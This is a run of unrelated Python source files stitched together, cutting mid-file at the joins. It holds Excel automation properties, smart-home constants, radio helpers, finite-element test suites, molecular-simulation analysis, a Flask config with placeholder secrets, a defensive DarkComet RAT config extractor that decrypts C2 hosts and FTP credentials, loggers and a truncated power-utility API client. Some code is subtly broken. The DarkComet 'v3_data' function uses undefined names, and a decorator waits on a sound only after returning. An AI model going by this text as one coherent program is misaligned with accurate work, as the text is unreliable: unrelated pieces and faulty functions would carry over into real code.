RegisteredFunctions = ProxyProperty('xl.RegisteredFunctions') 
ReplaceFormat = ProxyProperty('xl.ReplaceFormat') RollZoom = ProxyProperty('xl.RollZoom') Rows = ProxyProperty('xl.Rows') RTD = ProxyProperty('xl.RTD') ScreenUpdating = ProxyProperty('xl.ScreenUpdating') Selection = ProxyProperty('xl.Selection') # Sheets = ProxyProperty('xl.Sheets') SheetsInNewWorkbook = ProxyProperty('xl.SheetsInNewWorkbook') ShowChartTipNames = ProxyProperty('xl.ShowChartTipNames') ShowChartTipValues = ProxyProperty('xl.ShowChartTipValues') ShowDevTools = ProxyProperty('xl.ShowDevTools') ShowMenuFloaties = ProxyProperty('xl.ShowMenuFloaties') ShowQuickAnalysis = ProxyProperty('xl.ShowQuickAnalysis') ShowSelectionFloaties = ProxyProperty('xl.ShowSelectionFloaties') ShowStartupDialog = ProxyProperty('xl.ShowStartupDialog') ShowToolTips = ProxyProperty('xl.ShowToolTips') SmartArtColors = ProxyProperty('xl.SmartArtColors') SmartArtLayouts = ProxyProperty('xl.SmartArtLayouts') SmartArtQuickStyles = ProxyProperty('xl.SmartArtQuickStyles') Speech = ProxyProperty('xl.Speech') SpellingOptions = ProxyProperty('xl.SpellingOptions') StandardFont = ProxyProperty('xl.StandardFont') StandardFontSize = ProxyProperty('xl.StandardFontSize') StartupPath = ProxyProperty('xl.StartupPath') StatusBar = ProxyProperty('xl.StatusBar') TemplatesPath = ProxyProperty('xl.TemplatesPath') ThisCell = ProxyProperty('xl.ThisCell') ThisWorkbook = ProxyProperty('xl.ThisWorkbook') ThousandsSeparator = ProxyProperty('xl.ThousandsSeparator') Top = ProxyProperty('xl.Top') TransitionMenuKey = ProxyProperty('xl.TransitionMenuKey') TransitionMenuKeyAction = ProxyProperty('xl.TransitionMenuKeyAction') TransitionNavigKeys = ProxyProperty('xl.TransitionNavigKeys') UsableHeight = ProxyProperty('xl.UsableHeight') UsableWidth = ProxyProperty('xl.UsableWidth') UseClusterConnector = ProxyProperty('xl.UseClusterConnector') UsedObjects = ProxyProperty('xl.UsedObjects') UserControl = ProxyProperty('xl.UserControl') UserLibraryPath = ProxyProperty('xl.UserLibraryPath') UserName = ProxyProperty('xl.UserName') UseSystemSeparators = ProxyProperty('xl.UseSystemSeparators') Value = ProxyProperty('xl.Value') VBE = ProxyProperty('xl.VBE') Version = ProxyProperty('xl.Version') Visible = ProxyProperty('xl.Visible') WarnOnFunctionNameConflict = ProxyProperty('xl.WarnOnFunctionNameConflict') Watches = ProxyProperty('xl.Watches') Width = ProxyProperty('xl.Width') # Windows = ProxyProperty('xl.Windows') WindowsForPens = ProxyProperty('xl.WindowsForPens') WindowState = ProxyProperty('xl.WindowState') Workbooks = ProxyProperty('xl.Workbooks') WorksheetFunction = ProxyProperty('xl.WorksheetFunction') # Worksheets = ProxyProperty('xl.Worksheets') SHOULD_INIT_SIGNAL = True def should_init_sig(): """Return if init_sig_shutdown should be called on first Excel creation. This will set the SIGTERM and SIGINT handlers to call "shutdown" and close all Excel Applications run by this process. """ global SHOULD_INIT_SIGNAL return SHOULD_INIT_SIGNAL def set_init_sig(value): """Set if init_sig_shutdown should be called on first Excel creation. This will set the SIGTERM and SIGINT handlers to call "shutdown" and close all Excel Applications run by this process. 
""" global SHOULD_INIT_SIGNAL SHOULD_INIT_SIGNAL = value def init_sig_shutdown(func=None): """Set the SIGTERM and SIGINT handlers to call "shutdown" and close all Excel Applications run by this process.""" if func is None: func = shutdown signal.signal(signal.SIGTERM, func) signal.signal(signal.SIGINT, func) def shutdown(*args, sys_exit=True, **kwargs): """Close all Excel Applications run by this process.""" for excel in Excel.GLOBAL_EXCELS: try: excel.Quit() except (AttributeError, ValueError, TypeError, Excel): pass if sys_exit: sys.exit(-1) # Automatically register the shutdown function with atexit atexit.register(shutdown, sys_exit=False) """Collection of constants for all gadgets and characteristics""" # This file was generated by 'gadget_constants_exporter.py' at 'https://github.com/johannesgrothe/Smarthome_System' # Do not modify this file, modify 'gadget_docs/gadget_specs.json' and export. # Every change made will be overwritten at next export. import enum class CharacteristicIdentifier(enum.IntEnum): """Characteristics Gadgets can contain""" err_type = 0 # Error-Characteristic status = 1 # Status fan_speed = 2 # Fan Speed brightness = 3 # Brightness hue = 4 # Hue saturation = 5 # Saturation temperature = 6 # Temperature humidity = 7 # Humidity class GadgetIdentifier(enum.IntEnum): """Gadgets running on the ESP Clients""" any_gadget = 0 # Any Gadget lamp_neopixel_rgb_basic = 1 # NeoPixel Basic RGB Lamp lamp_basic = 2 # Basic Lamp fan_westinghouse_ir = 3 # Westinghouse IR Fan lamp_westinghouse_ir = 4 # Westinghouse IR Fan Lamp doorbell_basic = 5 # Doorbell Basic wallswitch_basic = 6 # Basic Wallswitch sensor_motion_hr501 = 7 # HR501 Motion Sensor sensor_temperature_dht = 8 # DHT Temperature/Humidity Sensor class BridgeGadgetIdentifier(enum.IntEnum): """Gadgets running on the Bridge itself (virtual Gadgets)""" """Helper functions for the controllers.""" from contextlib import contextmanager from functools import wraps import netifaces import pulsectl import simpleaudio as sa from mpd import MPDClient SLEEP_TIMER_SOUND = "/usr/local/lib/radio-interface/sleep-timer.wav" MPD_HOST, MPD_PORT = "localhost", 6600 def notify(function): """ Play a sound to inform the user that an action has been registered. To be used as a decorator. """ @wraps(function) def wrapper(*args, **kwargs): sleep_timer_sound = sa.WaveObject.from_wave_file(SLEEP_TIMER_SOUND) notification = sleep_timer_sound.play() return function(*args, **kwargs) notification.wait_done() return wrapper @contextmanager def connection_to_mpd(): """Context manager to establish the connection with MPD.""" mpd = MPDClient() try: mpd.timeout = 10 mpd.idletimeout = None mpd.connect(MPD_HOST, MPD_PORT) yield mpd finally: mpd.close() mpd.disconnect() @contextmanager def connection_to_pulseaudio(max_volume): """Context manager to establish a connection with Pulse Audio. Should be used each time getting the volume is necessary since the client is not synchronized when the volume is changed on another client. That is necessary for instance when changing the volume as the current volume is needed in order to apply a change. We also make sure we don't go above the maximum audio volume threshold set in the audio module. 
""" try: pulse_client = pulsectl.Pulse("radio-interface") pulse_sink = pulse_client.sink_list()[0] yield {"client": pulse_client, "sink": pulse_sink} finally: if pulse_client.volume_get_all_chans(pulse_sink) > max_volume: pulse_client.volume_set_all_chans(pulse_sink, max_volume) pulse_client.close() def local_ip_address() -> str: """Return local IP address.""" ip_address = netifaces.ifaddresses("wlan0") ip_address = ip_address[netifaces.AF_INET] ip_address = ip_address[0].get("addr") return ip_address def playing(content: str) -> str: """Fetch the currently playing content. Available content is: - name - album - artist - title """ with connection_to_mpd() as mpd: playing = mpd.currentsong() return playing.get(content) #!/usr/bin/env python3 #coding=utf-8 """ Small script intended to summarise the test data files outside the ratecounter framework (for setting up test cases only). """ from collections import Counter from nexus import NexusReader if __name__ == '__main__': import argparse parser = argparse.ArgumentParser(description='Does something.') parser.add_argument("filename", help='filename') args = parser.parse_args() nex = NexusReader(args.filename) patterns = Counter() for char_id in nex.data.characters: p = "".join([ nex.data.characters[char_id]['A'], nex.data.characters[char_id]['B'], nex.data.characters[char_id]['F'], ]) patterns[p] += 1 for p in patterns.most_common(): print(p) print(sum(patterns.values())) # import Kratos from KratosMultiphysics import * from KratosMultiphysics.IgaApplication import * import run_cpp_unit_tests import KratosMultiphysics.kratos_utilities as kratos_utilities # Import Kratos "wrapper" for unittests import KratosMultiphysics.KratosUnittest as KratosUnittest # Import Iga test factory tests from iga_test_factory import SinglePatchTest as SinglePatchTest # Truss tests - python based from truss_element_tests import TrussElementTests as TTrussElementTests # Membrane tests from iga_test_factory import MembraneSinglePatchFourPointSailLinearStatic as MembraneSinglePatchFourPointSailLinearStatic from iga_test_factory import MembraneSinglePatchFourPointSailNonLinearStatic as MembraneSinglePatchFourPointSailNonLinearStatic from iga_test_factory import MembraneSinglePatchFourPointSailImplicitDynamic as MembraneSinglePatchFourPointSailImplicitDynamic # 3p Shell KL - python based from shell_3p_element_tests import Shell3pElementTests as TShell3pElementTests # 3p Shell KL from iga_test_factory import ScordelisRoofShell3pTest as ScordelisRoofShell3pTest from iga_test_factory import LinearBeamShell3pTest as LinearBeamShell3pTest # 5p Shell Hierarchic from iga_test_factory import Shell5pHierarchicLinearThickBeamTest as TShell5pHierarchicLinearThickBeamTest from iga_test_factory import Shell5pHierarchicLinearScordelisTest as TShell5pHierarchicLinearScordelisTest from iga_test_factory import Shell5pHierarchicNonLinearThickBeamTest as TShell5pHierarchicNonLinearThickBeamTest # 5p Shell from iga_test_factory import ScordelisRoofShell5pTest as ScordelisRoofShell5pTest # Weak support tests from iga_test_factory import SinglePatchRefinedSupportPenaltyTest as SinglePatchRefinedSupportPenaltyTest from iga_test_factory import SinglePatchRefinedSupportLagrangeTest as SinglePatchRefinedSupportLagrangeTest from iga_test_factory import SinglePatchRefinedSupportNitscheTest as SinglePatchRefinedSupportNitscheTest # Coupling/C_0 tests from iga_test_factory import TwoPatchCouplingPenaltyShell3pTest as TwoPatchCouplingPenaltyShell3pTest from iga_test_factory import 
TwoPatchCouplingLagrangeShell3pTest as TwoPatchCouplingLagrangeShell3pTest from iga_test_factory import TwoPatchCouplingNitscheShell3pTest as TwoPatchCouplingNitscheShell3pTest from iga_test_factory import TwoPatchRefinedCouplingPenaltyMembraneTest as TwoPatchRefinedCouplingPenaltyMembraneTest from iga_test_factory import TwoPatchRefinedCouplingLagrangeMembraneTest as TwoPatchRefinedCouplingLagrangeMembraneTest from iga_test_factory import TwoPatchRefinedCouplingNitscheMembraneTest as TwoPatchRefinedCouplingNitscheMembraneTest # Rotation/G_1 coupling tests from iga_test_factory import TwoPatchCantileverCouplingPenaltyTest as TwoPatchCantileverCouplingPenaltyTest from iga_test_factory import TwoPatchCantileverRefinedCouplingPenaltyTest as TwoPatchCantileverRefinedCouplingPenaltyTest # Nurbs Volume tests from test_nurbs_volume_element import TestNurbsVolumeElement as TTestNurbsVolumeElements # Modelers tests from test_modelers import TestModelers as TTestModelers has_linear_solvers_application = kratos_utilities.CheckIfApplicationsAvailable("LinearSolversApplication") def AssembleTestSuites(): ''' Populates the test suites to run. Populates the test suites to run. At least, it should pupulate the suites: "small", "nighlty" and "all" Return ------ suites: A dictionary of suites The set of suites with its test_cases added. ''' suites = KratosUnittest.KratosSuites smallSuite = suites['small'] smallSuite.addTests(KratosUnittest.TestLoader().loadTestsFromTestCases([ # Single patch test - checks iga essentials SinglePatchTest, # Truss tests TTrussElementTests, # Membrane tests MembraneSinglePatchFourPointSailLinearStatic, MembraneSinglePatchFourPointSailNonLinearStatic, # 3p Shell KL TShell3pElementTests, ScordelisRoofShell3pTest, LinearBeamShell3pTest, # 5p Shell Director ScordelisRoofShell5pTest, # Weak support tests SinglePatchRefinedSupportPenaltyTest, SinglePatchRefinedSupportLagrangeTest, # Coupling tests TwoPatchCouplingPenaltyShell3pTest, TwoPatchCouplingLagrangeShell3pTest, TwoPatchRefinedCouplingPenaltyMembraneTest, TwoPatchRefinedCouplingLagrangeMembraneTest, # Rotation/G_1 coupling tests TwoPatchCantileverCouplingPenaltyTest, TwoPatchCantileverRefinedCouplingPenaltyTest, # Volumes TTestNurbsVolumeElements, # Modelers TTestModelers ])) if has_linear_solvers_application: from KratosMultiphysics import LinearSolversApplication if LinearSolversApplication.HasFEAST(): smallSuite.addTests(KratosUnittest.TestLoader().loadTestsFromTestCases([ # Weak support Nitsche test SinglePatchRefinedSupportNitscheTest, # Coupling Nitsche tests TwoPatchCouplingNitscheShell3pTest, TwoPatchRefinedCouplingNitscheMembraneTest ])) else: print("FEAST not available in LinearSolversApplication") nightSuite = suites['nightly'] nightSuite.addTests(smallSuite) nightSuite.addTests(KratosUnittest.TestLoader().loadTestsFromTestCases([ # Membrane tests MembraneSinglePatchFourPointSailImplicitDynamic, # 5p Shell Hierarchic TShell5pHierarchicLinearThickBeamTest, TShell5pHierarchicLinearScordelisTest, TShell5pHierarchicNonLinearThickBeamTest ])) allSuite = suites['all'] allSuite.addTests(nightSuite) return suites if __name__ == '__main__': KratosUnittest.runTests(AssembleTestSuites()) AdaptivePELE/analysis/calculateDistances.py from __future__ import absolute_import, division, print_function, unicode_literals import os import glob import time import argparse import numpy as np import mdtraj as md import multiprocessing as mp from AdaptivePELE.utilities import utilities from AdaptivePELE.analysis import analysis_utils def 
parseArguments(): """ Parse the command-line options :returns: object -- Object containing the options passed """ desc = "Program that caculates the relative SASA of a ligand." parser = argparse.ArgumentParser(description=desc) parser.add_argument("residues", type=str, nargs='+', help="Atom pairs to calculate the distances in the format res_name1:res_number1:atomname1-res_name2:res_number2:atomname2") parser.add_argument("--path", type=str, default=".", help="Path where the simulation is stored") parser.add_argument("--top", type=str, default=None, help="Topology file for non-pdb trajectories or path to Adaptive topology object") parser.add_argument("--out_name", type=str, default="fixedReport", help="Name of the modified report files (default is fixedReport)") parser.add_argument("--out_folder", type=str, default=None, help="Path where to store the report files (default is fixedReport)") parser.add_argument("-n", type=int, default=1, help="Number of processors to parallelize") parser.add_argument("--fmt_str", type=str, default="%.4f", help="Format of the output file (default is .4f which means all floats with 4 decimal points)") parser.add_argument("--new_report", action="store_true", help="Whether to create new report files instead of modifying existing ones") parser.add_argument("--traj_to_process", nargs="*", type=int, default=None, help="Number of the trajectories to filter, if not specified all of them will be processed") args = parser.parse_args() return args.residues, args.path, args.top, args.out_name, args.fmt_str, args.n, args.out_folder, args.new_report, args.traj_to_process def parse_selection(res_input): parsed_selection = [] for residues in res_input: res_info = residues.split("-") parsed_selection.append(tuple([tuple(res.split(":")) for res in res_info])) return parsed_selection def calculate_distances(trajectory, topology, residues): """ Calculate the distances between pairs of atoms in a trajectory :param trajectory: Name of the trajectory file :type trajectory: str :param topology: Topology of the trajectory (needed for non-pdb trajs) :type topology: str :param residues: Pairs of atoms to calculate distances :type residues: list """ utilities.print_unbuffered("Processing", trajectory) t = md.load(trajectory, top=topology) atom_pairs = [] for info1, info2 in residues: atom1 = t.top.select("resname '%s' and residue %s and name %s" % info1) atom2 = t.top.select("resname '%s' and residue %s and name %s" % info2) if atom1.size == 0 or atom2.size == 0: raise ValueError("Nothing found under current selection") atom_pairs.append(atom1.tolist()+atom2.tolist()) atom_pairs = np.array(atom_pairs) return 10*md.compute_distances(t, atom_pairs) def process_file(traj, top_file, residues, report, outputFilename, format_out, new_report, epoch, distances_header): start = time.time() distances = calculate_distances(traj, top_file, residues) header = "" if not new_report: try: reportFilename = glob.glob(report)[0] except IndexError: raise IndexError("File %s not found" % report) if outputFilename != reportFilename: reportFilename = outputFilename with open(reportFilename) as f: header = f.readline().rstrip() if not header.startswith("#"): header = "" reportFile = utilities.loadtxtfile(f) fixedReport = analysis_utils.extendReportWithRmsd(reportFile, distances) else: indexes = np.array(range(distances.shape[0])) fixedReport = np.concatenate((indexes[:, None], distances), axis=1) with open(outputFilename, "w") as fw: if header: fw.write("%s\t%s\n" % (header, distances_header)) else: fw.write("# 
Step\t%s\n" % distances_header) np.savetxt(fw, fixedReport, fmt=format_out, delimiter="\t") end = time.time() print("Took %.2fs to process" % (end-start), traj) def main(residues, folder, top, out_report_name, format_out, nProcessors, output_folder, new_report, trajs_to_select): """ Calculate the distances between paris of atoms :param residues: Pairs of atoms to calculate distances :type residues: list :param folder: Path the simulation :type folder: str :param top: Path to the topology :type top: str :param out_report_name: Name of the output file :type out_report_name: str :param format_out: String with the format of the output :type format_out: str :param nProcessors: Number of processors to use :type nProcessors: int :param output_folder: Path where to store the new reports :type output_folder: str :param new_report: Whether to create new reports :type new_report: bool :param trajs_to_select: Number of the reports to read, if don't want to select all :type trajs_to_select: set """ # Constants if output_folder is not None: out_report_name = os.path.join(output_folder, out_report_name) outputFilename = "_".join([out_report_name, "%d"]) trajName = "*traj*" reportName = "*report*_%d" distances_label = "\t".join(residues) residues = parse_selection(residues) if nProcessors is None: nProcessors = utilities.getCpuCount() nProcessors = max(1, nProcessors) print("Calculating distances with %d processors" % nProcessors) epochs = utilities.get_epoch_folders(folder) if top is not None: top_obj = utilities.getTopologyObject(top) else: top_obj = None files = [] if not epochs: # path does not contain an adaptive simulation, we'll try to retrieve # trajectories from the specified path files = analysis_utils.process_folder(None, folder, trajName, reportName, os.path.join(folder, outputFilename), top_obj, trajs_to_select) for epoch in epochs: print("Epoch", epoch) files.extend(analysis_utils.process_folder(epoch, folder, trajName, reportName, os.path.join(folder, epoch, outputFilename), top_obj, trajs_to_select)) print("Starting to process files!") pool = mp.Pool(nProcessors) results = [pool.apply_async(process_file, args=(info[0], info[2], residues, info[1], info[4], format_out, new_report, info[3], distances_label)) for info in files] pool.close() pool.join() for res in results: res.get() if __name__ == "__main__": pairs, path, topology_path, out_name, fmt_str, n_proc, out_folder, new_reports, traj_filter = parseArguments() if traj_filter is not None: traj_filter = set(traj_filter) main(pairs, path, topology_path, out_name, fmt_str, n_proc, out_folder, new_reports, traj_filter) #pylint: disable-msg=R0903 import os basedir = os.path.abspath(os.path.dirname(__file__)) class Config(object): CSRF_ENABLED = True SECRET_KEY = os.environ.get('SECRET_KEY') or 'my secret key' UPLOADS_DEFAULT_DEST = os.environ.get('UPLOADS_DEFAULT_DEST') or basedir + '/app/static/uploads' MAIL_SERVER = os.environ.get('MAIL_SERVER') or 'smtp.gmail.com' MAIL_PORT = os.environ.get('MAIL_POST') or 465 MAIL_USE_SSL = os.environ.get('MAIL_USE_SSL') or True MAIL_USERNAME = os.environ.get('MAIL_USERNAME') or '' MAIL_PASSWORD = os.environ.get('MAIL_PASSWORD') or '' FB_APP_ID = os.environ.get('FB_APP_ID') or 'my_app_id' FB_APP_SECRET = os.environ.get('FB_APP_SECRET') or 'my_app_secret' FB_PAGE_ID = os.environ.get('FB_PAGE_ID') or 'my_page_id' GOOGLE_ANALYTICS_ID = os.environ.get('GOOGLE_ANALYTICS_ID') or 'XXXX' BABEL_DEFAULT_LOCALE = 'is' AFLAFRETTIR_USER = os.environ.get('AFLAFRETTIR_USER') or 'USERNAME' AFLAFRETTIR_PASS = 
os.environ.get('AFLAFRETTIR_PASS') or 'PASSWORD' class DevelopmentConfig(Config): DEBUG = True SQLALCHEMY_DATABASE_URI = os.environ.get('DEV_DATABASE_URL') or \ 'sqlite:///' + os.path.join(basedir, 'data-dev.sqlite') WHOOSH_BASE = os.environ.get('WHOOSH_BASE_DEV') or \ os.path.join(basedir, 'whoosh-dev.db') IMAGE_DELETE = { 'TIME_OF_DAY': [i for i in range(24)], 'WEEKDAY': [i for i in range(7)] } POSTS_PER_PAGE = 40 class TestingConfig(Config): TESTING = True SQLALCHEMY_DATABASE_URI = os.environ.get('TEST_DATABASE_URL') or \ 'sqlite:///' + os.path.join(basedir, 'test-dev.sqlite') WHOOSH_BASE = os.environ.get('WHOOSH_BASE_TEST') or \ os.path.join(basedir, 'whoosh-test.db') POSTS_PER_PAGE = 4 class ProductionConfig(Config): SQLALCHEMY_DATABASE_URI = os.environ.get('DATABASE_URL') or \ 'sqlite:///' + os.path.join(basedir, 'data.sqlite') WHOOSH_BASE = os.environ.get('WHOOSH_BASE') or \ os.path.join(basedir, 'whoosh.db') IMAGE_DELETE = { 'TIME_OF_DAY': [3, 4], 'WEEKDAY': [0] } POSTS_PER_PAGE = 40 config = {'development': DevelopmentConfig, 'testing': TestingConfig, 'production': ProductionConfig, 'default': DevelopmentConfig} import string from binascii import * import pefile from common import Modules, load_yara_rules, PEParseModule, ModuleMetadata from types import StringType class darkcomet(PEParseModule): def __init__(self): md = ModuleMetadata( module_name="darkcomet", bot_name="DarkComet", description="RAT", authors=[" (@botnet_hunter)", " <>"], version="1.0.1", date="Oct 04, 2015", references=[] ) PEParseModule.__init__(self, md) self.yara_rules = None pass def _generate_yara_rules(self): if self.yara_rules is None: self.yara_rules = load_yara_rules("darkcomet.yara") return self.yara_rules @staticmethod def rc4crypt(data, key): x = 0 box = range(256) for i in range(256): x = (x + box[i] + ord(key[i % len(key)])) % 256 box[i], box[x] = box[x], box[i] x = 0 y = 0 out = [] for char in data: x = (x + 1) % 256 y = (y + box[x]) % 256 box[x], box[y] = box[y], box[x] out.append(chr(ord(char) ^ box[(box[x] + box[y]) % 256])) return ''.join(out) @staticmethod def v51_data(data, enckey): config = {"FWB": "", "GENCODE": "", "MUTEX": "", "NETDATA": "", "OFFLINEK": "", "SID": "", "FTPUPLOADK": "", "FTPHOST": "", "FTPUSER": "", "FTPPASS": "", "FTPPORT": "", "FTPSIZE": "", "FTPROOT": "", "PWD": ""} dec = darkcomet.rc4crypt(unhexlify(data), enckey) dec_list = dec.split('\n') for entries in dec_list[1:-1]: key, value = entries.split('=') key = key.strip() value = value.rstrip()[1:-1] clean_value = filter(lambda x: x in string.printable, value) config[key] = clean_value config["Version"] = enckey[:-4] return config @staticmethod def v3_data(data, key): config = {"FWB": "", "GENCODE": "", "MUTEX": "", "NETDATA": "", "OFFLINEK": "", "SID": "", "FTPUPLOADK": "", "FTPHOST": "", "FTPUSER": "", "FTPPASS": "", "FTPPORT": "", "FTPSIZE": "", "FTPROOT": "", "PWD": ""} dec = darkcomet.rc4crypt(unhexlify(data), key) config[str(entry.name)] = dec config["Version"] = enckey[:-4] return config @staticmethod def versionCheck(rawData): if "#KCMDDC2#" in rawData: return "#KCMDDC2#-890" elif "#KCMDDC4#" in rawData: return "#KCMDDC4#-890" elif "#KCMDDC42#" in rawData: return "#KCMDDC42#-890" elif "#KCMDDC42F#" in rawData: return "#KCMDDC42F#-890" elif "#KCMDDC5#" in rawData: return "#KCMDDC5#-890" elif "#KCMDDC51#" in rawData: return "#KCMDDC51#-890" else: return None @staticmethod def configExtract(rawData, key): config = {"FWB": "", "GENCODE": "", "MUTEX": "", "NETDATA": "", "OFFLINEK": "", "SID": "", "FTPUPLOADK": "", 
"FTPHOST": "", "FTPUSER": "", "FTPPASS": "", "FTPPORT": "", "FTPSIZE": "", "FTPROOT": "", "PWD": ""} pe = pefile.PE(data=rawData) rt_string_idx = [entry.id for entry in pe.DIRECTORY_ENTRY_RESOURCE.entries].index(pefile.RESOURCE_TYPE['RT_RCDATA']) rt_string_directory = pe.DIRECTORY_ENTRY_RESOURCE.entries[rt_string_idx] for entry in rt_string_directory.directory.entries: if str(entry.name) == "DCDATA": data_rva = entry.directory.entries[0].data.struct.OffsetToData size = entry.directory.entries[0].data.struct.Size data = pe.get_memory_mapped_image()[data_rva:data_rva+size] config = darkcomet.v51_data(data, key) elif str(entry.name) in config.keys(): data_rva = entry.directory.entries[0].data.struct.OffsetToData size = entry.directory.entries[0].data.struct.Size data = pe.get_memory_mapped_image()[data_rva:data_rva+size] dec = darkcomet.rc4crypt(unhexlify(data), key) config[str(entry.name)] = filter(lambda x: x in string.printable, dec) config["Version"] = key[:-4] return config @staticmethod def run(data): versionKey = darkcomet.versionCheck(data) if versionKey != None: config = darkcomet.configExtract(data, versionKey) return config else: return None def get_bot_information(self, file_data): results = darkcomet.run(file_data) # Sanitize for key in results.keys(): if type(results[key]) is StringType: results[key] = results[key].encode("string-escape") if "NETDATA" in results and len(results["NETDATA"]) > 0: c2s = results["NETDATA"].split("|") results['c2s'] = [] for c2 in c2s: results['c2s'].append({"c2_uri": "tcp://" + c2 + "/"}) return results Modules.list.append(darkcomet())factory-ai-vision/EdgeSolution/modules/WebModule/backend/vision_on_edge/azure_parts/api/serializers.py """App API serializers. """ import logging from django.db.utils import IntegrityError from rest_framework import serializers from rest_framework.exceptions import ValidationError from ..exceptions import PartSameNameExistError from ..models import Part logger = logging.getLogger(__name__) class PartSerializer(serializers.ModelSerializer): """PartSerializer.""" local_image_count = serializers.IntegerField(read_only=True, source="get_tagged_images_count_local") remote_image_count = serializers.IntegerField(read_only=True, source="get_tagged_images_count_remote") class Meta: model = Part fields = "__all__" extra_kwargs = {"description": {"required": False}} def create(self, validated_data): """create. Args: validated_data: """ try: return Part.objects.create(**validated_data) except (IntegrityError, ValidationError): raise PartSameNameExistError def update(self, instance, validated_data): """update. Args: instance: validated_data: """ try: result = super().update(instance, validated_data) return result except (IntegrityError, ValidationError): raise PartSameNameExistError #!/usr/bin/env python # -*- coding: utf-8 -*- # ------------------------------------------------------------------- # Copyright (c) 2010-2020 # This file is part of the extensive automation project # # This library is free software; you can redistribute it and/or # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. # # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. 
# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, # MA 02110-1301 USA # ------------------------------------------------------------------- import logging import logging.handlers LG = None # Singleton def instance(): """Returns Singleton""" return LG def info(txt): """Log info message""" global LG LG.info(txt) def error(txt): """Log error message""" global LG LG.error(txt) def debug(txt): """Log trace message""" global LG LG.debug(txt) def initialize(log_file, level, max_size, nb_files): """initialize""" global LG LG = logging.getLogger('Logger') set_level(level=level) max_bytes = int(max_size.split('M')[0]) * 1024 * 1024 handler = logging.handlers.RotatingFileHandler(log_file, maxBytes=int(max_bytes), backupCount=int(nb_files) ) formatter = logging.Formatter("%(asctime)s - %(levelname)s - %(message)s") handler.setFormatter(formatter) LG.addHandler(handler) def set_level(level): """set the level log""" global LG # write everything messages if level == 'DEBUG': LG.setLevel(logging.DEBUG) # write anything that is an error or worse. if level == 'ERROR': LG.setLevel(logging.ERROR) # write anything that is an info message or worse. if level == 'INFO': LG.setLevel(logging.INFO) def finalize(): """Destroy Singleton""" global LG if LG: logging.shutdown() LG = None# Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. 
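
# A minimal usage sketch for the rotating-file logger defined above; the log
# file name, level and size values are illustrative assumptions only.
if __name__ == '__main__':
    initialize(log_file='ea_server.log', level='INFO', max_size='10M', nb_files=5)
    info('server started')
    debug("only written when the level is set to 'DEBUG'")
    finalize()
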
import logging import os from os import listdir from os.path import join from ..core.utils import is_temporary_output_file from .OutputValidator import OutputValidator class FileOutputValidator(OutputValidator): def set_output_dir(self, output_dir): self.output_dir = output_dir @staticmethod def num_files_matching_content_in_dir(dir_path, expected_content): listing = listdir(dir_path) if not listing: return 0 files_of_matching_content_found = 0 for file_name in listing: full_path = join(dir_path, file_name) if not os.path.isfile(full_path) or is_temporary_output_file(full_path): continue with open(full_path, 'r') as out_file: contents = out_file.read() logging.info("dir %s -- name %s", dir_path, file_name) logging.info("expected content: %s -- actual: %s, match: %r", expected_content, contents, expected_content in contents) if expected_content in contents: files_of_matching_content_found += 1 return files_of_matching_content_found @staticmethod def get_num_files(dir_path): listing = listdir(dir_path) logging.info("Num files in %s: %d", dir_path, len(listing)) if not listing: return 0 files_found = 0 for file_name in listing: full_path = join(dir_path, file_name) if os.path.isfile(full_path) and not is_temporary_output_file(full_path): logging.info("Found output file in %s: %s", dir_path, file_name) files_found += 1 return files_found def validate(self, dir=''): pass from ipuz.exceptions import IPUZException from .stylespec import validate_stylespec def validate_styledcell(field_data): if (field_data is not None and type(field_data) not in [int, dict] and not isinstance(field_data, str)): return False if isinstance(field_data, dict): if not field_data: return False if not all(key in ("cell", "style") for key in field_data): return False if ("cell" in field_data and field_data["cell"] is not None and type(field_data["cell"]) is not int and not isinstance(field_data["cell"], str)): return False if "style" in field_data: try: validate_stylespec(field_data["style"]) except IPUZException: return False return True 861934367/genecast import matplotlib as mpl mpl.use('Agg') import pysam import pandas as pd import numpy as np import matplotlib.pyplot as plt import seaborn as sns import argparse as apa import multiprocessing def isPaired(bamfile, alignments=1000): '''check if a *bamfile* contains paired end data The method reads at most the first *alignments* and returns True if any of the alignments are paired. ''' samfile = pysam.Samfile(bamfile) n = 0 for read in samfile: if read.is_paired: break n += 1 if n == alignments: break samfile.close() return n != alignments def estimateInsertSizeDistribution(bamfile, alignments=1000): ''' estimate insert size from first alignments in bam file. returns mean and stddev of insert sizes. 
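    Note: the values are returned as a numpy array of positive template
    lengths; compute .mean() and .std() on it for the summary statistics.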
''' assert isPaired(bamfile), \ 'can only estimate insert size from' \ 'paired bam files' samfile = pysam.Samfile(bamfile) # only get positive to avoid double counting inserts = np.array([read.tlen for read in samfile if read.is_proper_pair and read.tlen > 0]) return inserts def plot(list, name): sns.distplot(list) plt.savefig(name + "_insert_size.png") plt.close() def plot_insert_size(bam_file): inserts = estimateInsertSizeDistribution(bam_file) plot(inserts, bam_file.rstrip(".bam")) if __name__ == "__main__": parser = apa.ArgumentParser(prog="convert") parser.add_argument("bams", nargs='*', help="*.bam") parser.add_argument('-p', '--progress', required=False, default=1, type=int, help='parallel') args = parser.parse_args() pool = multiprocessing.Pool(processes=args.progress) for file in args.bams: pool.apply_async(plot_insert_size, (file,)) pool.close() pool.join()krconv/greenmountainpower import dataclasses import datetime import enum import oauthlib import requests_oauthlib from . import exceptions _CLIENT_ID = "C95D19408B024BD4BEB42FA66F08BCEA" _BASE_URL = "https://api.greenmountainpower.com" @dataclasses.dataclass class Usage: start_time: datetime.datetime consumed_kwh: float @classmethod def try_parse_data(cls, data: dict): try: yield cls( start_time=datetime.datetime.strptime( data["date"], "%Y-%m-%dT%H:%M:%SZ" ), consumed_kwh=data["consumed"], ) except KeyError: pass class UsagePrecision(enum.Enum): MONTHLY = "monthly" DAILY = "daily" HOURLY = "hourly" class GreenMountainPowerApi: """Client for 